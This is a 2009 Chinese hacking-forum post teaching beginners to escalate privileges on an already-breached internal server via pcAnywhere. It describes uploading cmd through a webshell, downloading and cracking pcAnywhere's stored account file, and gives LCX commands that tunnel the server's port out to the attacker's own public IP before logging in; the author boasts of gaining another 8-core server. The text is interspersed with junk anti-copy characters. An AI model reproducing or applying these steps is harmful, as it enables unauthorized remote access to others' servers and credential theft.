|
 
- 帖子
- 199
- 积分
- 724
- 威望
- 508
- 金钱
- 10463
- 在线时间
- 185 小时
      
|
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。0 M7 e! n6 ^( X& k% Y# D
4 ?) ]( t% B9 R) J* c提权方法:pcanywhere+LCX
: T5 d8 f4 B' R; P9 x, a0 n7 m" f6 C* ?! ]/ z
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
2 D( `7 R3 n4 f! v) C% `& w- @
* e3 ^# j7 h7 }5 M0 v4 w2 n在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
/ M- E/ v& O2 F: P& n0 {5 m
H6 w5 P! h2 D; P I5 U- J
; l( Y' m! f K查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
6 u% |9 u1 _$ ~ L% K5 T
/ C. Z8 c. D& C; F/ Y7 t) \+ B* _$ }+ g( X
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
?( Z/ G6 g8 r5 Y0 k: a: D- R# I0 J( b2 v. G
P; b. y, I9 ]. @; P, m# J
+ z' p/ x5 c2 x
0 n" u6 O$ F; {9 f1 m由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
, I" f2 t, G: {, o. V0 H) K- l% T* I# ^8 z' b! V: Q F* y2 u' ^
) o9 A- Z9 F! K4 u s1 n" Z, bLCX的用法再简单说下:7 V4 L! v% w, s, _3 |
" i- q) g; H) N" _服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
1 D* b3 k. r( d6 S( s0 I
" E( O" C3 f# s" z, H( g6 U1 P本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)% \# N- k* K* L& w; u
! i$ K I8 ] m! N8 W
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
5 j2 G/ R, t" K6 p2 S顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``4 O' e) T, b" a2 K6 L+ \' [2 l
2 p8 C& N8 p! x! n9 {2 x! ?* d
' [8 ~1 J7 a' B8 f$ R- e6 o. E- I& [- E8 ]3 z+ E/ ?
, B( T8 @6 m. h x& ^
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
; [/ o$ ^+ i1 q& b+ L, T9 Z4 I/ S1 ^
1 n& e# n7 P u3 e$ j- {: i5 `! O; W; M& p; y. [% u/ s
# e( e" a1 ]1 H# b) `; S我们本地连接试试,输入我们刚破解的账号密码
0 i# p7 m7 A8 m, j( t" {) z! g/ |% E7 t. r( S4 B% O0 y3 a0 [
0 E4 D, ]5 Y5 z! |. R5 |( Q9 v
呵呵``连接成功,服务器不错,又一个8核^︵^
; g9 R! s$ l7 Z! j) B" j5 K) w- }, [5 `6 Q5 h
: Z3 e" i- [* E# [
9 t( q* }: \/ W O
|
附件: 您需要登录才可以下载或查看附件。没有帐号?注册
-
1
评分人数
-
|
发表于 2009-7-5 21:35
| 
发表于 2009-7-5 21:37
| .gif)
